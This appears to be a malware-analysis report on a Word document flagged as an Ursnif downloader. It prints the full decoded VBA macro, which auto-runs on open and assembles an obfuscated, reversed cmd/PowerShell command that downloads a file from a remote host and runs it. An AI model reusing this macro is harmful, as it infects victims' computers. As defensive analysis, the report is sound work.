Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8a5fc4a305ac0fd4…

MALICIOUS

Office (OLE)

69.8 KB Created: 2018-09-05 07:20:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: fd43586413155c420828de4a54595112 SHA-1: d9065296a08459a37cada8e25cbf6b84cdbffa23 SHA-256: 8a5fc4a305ac0fd41d0be6badc6616b18e23ef0c099850b5d9d9a8dd41fa59fc
182 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3927 bytes
SHA-256: c359eb592086be80d872f630de7bca9ede04bd98cf3445fc9276672c568fcfee
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DRTRwiSFKzS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Export header of the document-level class module (VB_Base = "1Normal.ThisDocument",
' VB_PredeclaredId = True): this is the module in which the Document_open handler
' below lives, so it is the one Word invokes automatically on open. The module
' name is a random-looking string, matching the generated identifiers used for
' every helper and variable in this macro (a naming pattern worth keying on
' when triaging similar documents).
' Auto-run entry point (the OLE_VBA_DOCOPEN finding above): Word runs this when
' the document is opened. Apart from the error handler, the body is a single
' VBA.Shell call surrounded by filler statements.
Private Sub Document_open()
' "On Error Resume Next", split across line continuations (presumably to defeat
' naive pattern matching on the source text). Any runtime error raised below,
' including by the Hour calls, is silently ignored, so the Shell line is always
' reached.
On _
Error _
Resume _
Next
   ' Hour "...": the date function Hour is called as a statement with a
   ' concatenated literal; its result is discarded and, on a non-date string,
   ' the type error is swallowed by the handler above. These lines appear to be
   ' pure noise/padding — TODO confirm no side effect in a sandbox.
   Hour "9527" + "7873" + "37651303" + "5136"
   Hour "TPU" + "SqE"
   Hour "quAqPXA" + "vEGiRVQG"
' The OLE_VBA_SHELL finding. The command line is assembled at run time from
' CleanString(LIW) plus the return values of six helper functions; MGRTOoboT and
' Fjsrqj are shown below, while LIW, KMsRSTjj, MkjBNdBKUR, CuDEroiQRTC and
' DiiXcXamsIj are defined outside this excerpt. The window-style argument
' 48 - 48 evaluates to 0 (vbHide), so the spawned process has no visible window.
VBA.Shell CleanString(LIW) + KMsRSTjj + MkjBNdBKUR + MGRTOoboT + Fjsrqj + CuDEroiQRTC + DiiXcXamsIj, 48 - 48
   ' More discarded Hour calls (see note above).
   Hour "jUJA" + "cLl"
   Hour "osJzBZw" + "JwNObrzbH" + "44627896" + "hwVJwTnstpsJl"
   Hour "TAq" + "T" + "dr" + "1745"
End Sub



Attribute VB_Name = "aCitpKJfHnAMqj"
' Export header of a second (standard) module holding the string-building
' helpers MGRTOoboT and Fjsrqj that Document_open concatenates into its
' Shell command line.
' Builds the first part of the command line passed to VBA.Shell in
' Document_open. The returned text is a cmd.exe command in which nearly every
' token is broken up with '^' (the cmd escape character, stripped when the line
' is parsed) and the literal strings are split into many small concatenated
' pieces — both apparently intended so that keywords such as "set", "powershell"
' or the URL never appear contiguously in the VBA source. Several fragments read
' as reversed text (e.g. "^ ^ll" "e" "h^" "sr^" "ew" "o^p" is "llehsrewop"),
' consistent with the countdown loop started at the end of this function; the
' exact decoded command should be confirmed in an isolated sandbox rather than
' inferred from the source. The interleaved Hour "..." lines are discarded
' calls whose errors are swallowed (see Document_open).
Function MGRTOoboT()

' Error handler split across line continuations; every Hour error below is ignored.
On _
Error _
Resume _
Next
Hour "408921371" + "2929"
   Hour "457104822" + "JquwptvAVhfcc" + "VAwiwjJzd" + "Qriw"
   Hour "r" + "8551"
' Fragment 1: "cmd /V:ON/C" followed by Chr(5+4+3+2+20) = Chr(34), a double
' quote. /V:ON enables delayed (!var!) expansion, which the substring
' expressions in Fjsrqj rely on. Then "set R^J^Lk=" begins assigning a
' variable (carets elided) whose value is the obfuscated payload text.
KKFmTBzZFC = "cmd /V" + "^:" + "^ON/C" + Chr(5 + 4 + 3 + 2 + 20) + "^" + "se^t R" + "^J^L" + "^" + "k=  ^ " + "^ ^ "
Hour "r" + "iSI"
   Hour "PzfV" + "bfUEFSja" + "339863942" + "4516"
   Hour "ibt" + "5507" + "7876" + "897"
   Hour "JWB" + "uuwRk" + "NC" + "140188785"
' Fragments 2-11: pieces of the variable's value, each caret-obfuscated and
' apparently stored back to front (e.g. "t^p^$^ ^met^I-^ek^ovn^I" and
' "tn eilC^be^W.^t eN ^tc^ej^b^o^-^w^e n" read as PowerShell-style tokens when
' reversed). A fragment ending "tth^'^=" looks like the tail of a reversed
' http URL — treat the embedded host/path as an IoC to be extracted by
' sandboxed execution, not reconstructed by hand.
GjHBU = "^  ^ " + "  ^   ^" + " ^ ^ ^ " + "^}}" + "^{" + "^" + "hc^t" + "ac^}" + "^;^k" + "^a^" + "er^b" + ";^m^"
Hour "WjQkiH" + "sFwH" + "310214689" + "6934"
   Hour "448161795" + "138036378"
   Hour "Cjl" + "dP" + "GDzzoSwKOUtzFo" + "mwO"
bUMbT = "t^p" + "^$" + "^ ^met" + "I-^ek^" + "ovn^I^;" + ")^mt^p" + "^$^ ,^" + "DSv^"
Hour "PtTBzXClvPZ" + "477149894"
siqQX = "$(^e^l" + "i^F^d" + "^" + "a^" + "o^lnw" + "^oD.t^X" + "b$" + "^{y"
Hour "jQ" + "549" + "64151038" + "uoAhrcOjRs"
   Hour "ovVOLqJj" + "29"
   Hour "vtYT" + "7598"
iplwHH = "r^t^{)" + "GAN^" + "$ ni" + "^ D" + "^Sv^" + "$" + "(h" + "ca" + "er" + "o^f^;" + "^'e^x^" + "e." + "^'+t"
Hour "39951222" + "ZYwVLUTA" + "X" + "FU"
   Hour "6682" + "394862022"
   Hour "rGT" + "r"
NhsjSVw = "zR^$" + "^+^" + "'^\" + "'^+ci^" + "l"
Hour "km" + "t"
qtKAfBZNX = "^" + "b^up:" + "vne" + "^" + "$=^mt^p" + "^$^;'^" + "17"
Hour "XupsT" + "Ydb"
IrzWikzwU = "^3" + "^' ^=" + "^ t^zR$" + "^;)'@'(" + "ti^lp^" + "S^.^'" + "n^k" + "t.1rgr^" + "=^" + "l^?php" + "^.^hdsa" + "no^u^h/" + "YU"
Hour "T" + "adKPQjNlPAEwZ" + "YQatwzt" + "5961"
   Hour "nLATdr" + "7522"
GnCTZJ = "^Y/^moc" + "^." + "eqcx^z^" + "dsao^" + "pop/" + "/:p" + "tth^'^="
Hour "1729" + "518174323"
   Hour "iJ" + "469920665"
QAQTpGuht = "GAN^$" + "^" + ";^" + "tn" + "eilC^" + "be^" + "W.^t" + "eN ^tc^" + "ej^b^" + "o^-^w^e" + "n^=^t" + "X^b^$"
Hour "qdKlfooV" + "n" + "L" + "UJTwQzWE"
   Hour "ktN" + "885" + "psvaP" + "wDSp"
' Fragment 11 ends the variable value ("...llehsrewop") and starts
' "&&for /L %B i" — the loop whose remainder follows in fragment 12.
jZAjvqMPo = "^ ^ll" + "e" + "h^" + "sr^" + "ew" + "o^p" + "&&^f" + "^or /^L" + " %^B" + " ^i"
Hour "wqzf" + "jZJFnft" + "XZb" + "1952"
   Hour "qiq" + "GXNShLN" + "422214759" + "OjEQhCz"
   Hour "rSRzd" + "Mp"
   Hour "476471720" + "78581482" + "1968" + "4286"
' Fragment 12: "n (261,-1,0) do set T" — a for /L loop counting %B down from
' 261 to 0. The "set T..." statement it begins is completed by the text Fjsrqj
' returns, so the full loop body is only visible once all Shell operands are
' concatenated.
ztrzGn = "n (" + "^2^61^" + ",^-1" + ",^0" + ")^d^o" + " ^" + "s^et T"
' Return value: the twelve fragments joined in declaration order.
MGRTOoboT = KKFmTBzZFC + GjHBU + bUMbT + siqQX + iplwHH + NhsjSVw + qtKAfBZNX + IrzWikzwU + GnCTZJ + QAQTpGuht + jZAjvqMPo + ztrzGn
   Hour "O" + "175032094"
   Hour "a" + "MpSjrusOJoIGzL" + "iP" + "fDPYrf"
   Hour "IpnP" + "3006"
End Function
' Builds the next part of the Shell command line, continuing the "set T"
' statement that MGRTOoboT's last fragment leaves open. With carets removed the
' two pieces read roughly as: jEU=!TjEU!!RJLk:~%B,1!&&if %B==0 call %TjEU:*TjEU!=%
' followed by a closing double quote (Chr(34)). Using delayed expansion, each
' loop iteration appends one character of the R..k variable, indexed by the
' countdown value %B, to TjEU — which is how the reversed fragments in
' MGRTOoboT are presumably turned back into a forward command — and on the
' final iteration (%B==0) the accumulated text is executed via call. This
' reading is inferred from the source; confirm by detonating the sample in an
' isolated sandbox. The Hour lines are discarded filler calls (see Document_open).
Function Fjsrqj()

' Error handler split across line continuations; Hour errors below are ignored.
On _
Error _
Resume _
Next
Hour "YBc" + "bV" + "WUvb" + "wzLTUwm"
   Hour "bKjTnJmj" + "113543549" + "35639890" + "453695157"
   Hour "ko" + "3790" + "477076727" + "4624"
   Hour "30151264" + "401759172"
   Hour "wClCbtO" + "40108130"
' Piece 1: the per-character append (":~%B,1" is cmd substring syntax: one
' character at offset %B) and the start of the "if %B==0 cal..." guard.
QbiHj = "^j^E^U" + "=!T^j^" + "E^U!" + "!R^J^" + "L^k:~%^" + "B,1!&" + "&i" + "^f %" + "^B=^=^" + "0 " + "c^a" + "^l"
Hour "pp" + "5933"
   Hour "TQnsIn" + "i" + "fSH" + "3352"
   Hour "133516207" + "CMpWYAnA"
' Piece 2: "...l %TjEU:*TjEU!=%" — the second half of "call" plus a
' variable-substitution expression that strips a leading prefix from the
' accumulated value — then Chr(5+4+3+2+20) = Chr(34), the closing quote for
' the cmd /C "..." string opened in MGRTOoboT.
kiTjn = "^l %" + "T^j" + "^E" + "^" + "U:^" + "*^T" + "jE" + "^U^!^=" + "%" + Chr(5 + 4 + 3 + 2 + 20)
' Return value: the two pieces joined.
Fjsrqj = QbiHj + kiTjn
   Hour "287381456" + "qpLhjHMnhHcbr"
   Hour "5535" + "zBsIqiN"
End Function